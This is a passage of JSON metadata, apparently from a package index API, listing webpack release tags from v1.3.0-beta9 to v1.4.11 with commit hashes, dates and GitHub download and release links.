dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v